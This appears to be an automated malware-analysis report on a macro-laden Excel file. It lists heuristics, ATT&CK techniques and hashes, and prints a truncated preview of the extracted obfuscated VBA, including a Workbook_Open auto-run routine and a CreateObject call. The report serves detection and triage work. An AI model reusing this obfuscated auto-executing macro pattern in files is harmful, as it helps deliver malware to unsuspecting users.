MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an OOXML document containing a Workbook_Open VBA macro. This macro utilizes Shell() and CreateObject calls, indicating an attempt to execute arbitrary code. The obfuscated VBA code within 'macros.bas' likely serves to download and execute a secondary payload, a common technique for malware delivery.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17454 bytes |
SHA-256: 2a14e847e3acbe656f000b9c774ef5ade9b0c5f982fd64842ebe05edad8db3ca |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
wokeaWVwYpIABSOl.gpY_LPERzvchzhak6ewM
While 27 = 9265
Dim dtSjjaXIvFAYfIddCcJFovWPKs_zTFsqxDB5EclypHC As Variant
Wend
Dim oaHRW6F3BkEK As Integer
While 13 = 4163
Dim rUBXzUhxoVSkbFhWi1UYfrrxCZp4MLq_q2SiC_ubGSWQGfyPV As Variant
Wend
Dim rSIOpn9mLTYnnja As Integer
While 7 = 9270
Dim oM3jw9Tc_2QKTYpejYfe3fyALS6ysUwcs5l3mNbVWy_VW As Variant
Wend
Dim anLfyxNFDgHX As Integer
While 8 = 6684
Dim WbCdtr_xbXwv2T6HGDZaltorR4ghUnVcdu1_S3DVQi9NXs6bR76cq As Variant
Wend
Dim NlwSJzJfawASQ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "wokeaWVwYpIABSOl"
Dim AQuOt5BbseSCAQFHMU9g2_r2Ucn4UKfLMvX9sCXU_r3wQlHAzGX1SOIAi34PPFFg As String
Function Fc6yN9DHBuZSi7DNXq3ugeMK_qMJuGJLDZy9(wGKfe7PFC7Jpjs_lzyBaHDerWzk9yoBOiAbHf9ElvkgLBRLicvACV6JslcGnTPQW44EiO1E1sXngeQo_mBdBm82mysfBzZQeRHQFKlRlpIS8PmLSxC)
While 1 = 9477
Dim WU6tUetugytTOGMNA_eTYIbNHyKjA5RezWuudQXFMD4Xo As Variant
Wend
Dim zE7im6wRVNM2q As Integer
While 22 = 9032
Dim jeRHskfMd2VbtspWFTNDiQrNAW9dKbGf2wp2x_ As Variant
Wend
Dim SR1ZUMjF2LF As Integer
While 18 = 2735
Dim N39xFRvDFUlABAsyi7BxhBA6KG5dm4duWOLMg As Variant
Wend
Dim DoW_t78ozW As Integer
Dim H4J2uVk22n69QUUale2oo6Wn5dNg4p8TOPsekjDskIM9xRdY22YWS
While 5 = 5218
Dim Tdtf5IQUL2Bk8VQYL1zmuwdQdPnrx_BOUsj93Whk_3_Udbp_vTt As Variant
Wend
Dim FxLkf_bAmeigG As Integer
While 11 = 6458
Dim zuNMuQeyQNg2wHvBjm6cS5ZHFD9ZU4_eU2drMaNcx5xinsszo9 As Variant
Wend
Dim C2lDw4T_Eq As Integer
While 16 = 2258
Dim R_bVHAe4mCwGWanXE1cWSHuUzL2PDjWGTfJsaaYmLxLk As Variant
Wend
Dim J5cJXWxbkrVH As Integer
Dim uqY8AEjm8b4tEP3d3JUJK1go1X_LOWgYI5fqNz9TIlpPbc2vOnPcBvx4HtFkEWWi4cjIsKNBJA_hIPKVfL7jFDWVFlgdsWNvNEU93rCCYMQAuNt2hs_2YwbzELBEntRwuMSC4Lbw
While 22 = 5173
Dim SFe6GNzCoov1O57nazIe5HI5sq2pu5flIAYT5cd88H6eGl As Variant
Wend
Dim bZHAthzMI6 As Integer
While 8 = 5490
Dim jKZUHPsHIpNelr8TJfvKnvFvXOk3uCRw As Variant
Wend
Dim NXTPClx2KV As Integer
While 11 = 9180
Dim o6wZCXWSa8Pw_n63nzVEVZPMWpQhr39QxJEaaJzUo9UOF As Variant
Wend
Dim fKXo5LU91gNo As Integer
While 21 = 6317
Dim iBUFyjg8883hcab9AYWD_Ezd22vomR7l1v1HdMzWx As Variant
Wend
Dim QGhQzKctV8ZII As Integer
While 16 = 777
Dim nbJzN6w1ToAOpqiScvi9Or8QLBpR5OSeapGW7m93i66afAH As Variant
Wend
Dim c3Y2J1J35d3mK As Integer
While 22 = 5755
Dim Od5DUew9iJUywoXRveuJ3KXeWGnPwK As Variant
Wend
Dim D_vm_A1EAMH4rD As Integer
Set uqY8AEjm8b4tEP3d3JUJK1go1X_LOWgYI5fqNz9TIlpPbc2vOnPcBvx4HtFkEWWi4cjIsKNBJA_hIPKVfL7jFDWVFlgdsWNvNEU93rCCYMQAuNt2hs_2YwbzELBEntRwuMSC4Lbw = CreateObject(AQuOt5BbseSCAQFHMU9g2_r2Ucn4UKfLMvX9sCXU_r3wQlHAzGX1SOIAi34PPFFg)
While 11 = 1144
Dim BWJviH9GaQD_YpLzfKVQQy_BSQ4Xs7tPpZTsbdLB36gch9k As Variant
Wend
Dim I3Ip6gZuLWHaQN As Integer
While 16 = 1837
Dim iWdgwX8UbWB8TWUPebSpseiOwsNoFURB5wShC6u As Variant
Wend
Dim jlxYun7KBY62pG As Integer
While 13 = 1058
Dim kdCwMsCHRMF_9CfDvLhprC5_wkzfKNJbk3RQOtxKq
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 50688 bytes |
SHA-256: d577881f3d1a9d86a6d2d401f3ccd22212f0052f902239fd0b88dd905c596f26 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.